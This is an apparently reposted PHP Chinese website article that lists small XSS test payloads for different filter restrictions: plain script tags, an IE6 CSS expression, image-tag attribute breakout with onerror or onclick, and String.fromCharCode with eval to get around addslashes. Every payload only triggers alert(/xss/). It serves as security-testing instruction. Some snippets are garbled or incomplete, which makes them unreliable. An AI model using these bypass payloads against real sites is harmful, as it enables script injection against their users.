Home  >  Article  >  Operation and Maintenance  >  How is the small test of xss carried out?

How is the small test of xss carried out?

WBOY
WBOYforward
2023-05-19 11:37:06969browse
  • No security restrictions, use directly

##<script>alert(/xss/);</script>

  • Restrictions: Only CSS can be used, html tags are not allowed

We know that expression can be used to construct XSS, but it can only be tested under IE. Therefore, please perform the following test in IE6.

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}
  • Restrictions: HTML is escaped and the Image tag is available

    .

The characters entered in the test will be inserted into the src address, so you can use a pseudo-protocol to bypass it.

Enter directly

alert( /xss/);
Or you can use events to bypass, just pay attention to the closing statement, as follows:

1" onerror=alert(/xss/); var a="1

  • Restriction condition: Keyword filtering is used.

I tested it, most of it was filtered, and some were not filtered. After testing script/onerror, it was filtered, but onclick was not filtered. Use the onclick event to bypass

<img src=# onclick=alert(/xss/);>
  • Restrictions: Use addslashes to escape the characteristic characters

That is to say, single quotes, double quotes, etc. cannot appear in our XSS statements. Characteristic characters.

Use

<script>alert(/xss/);</script>
directly to bypass

or use the String.fromCharCode method, as follows:


<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

The above is the detailed content of How is the small test of xss carried out?. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:yisu.com. If there is any infringement, please contact admin@php.cn delete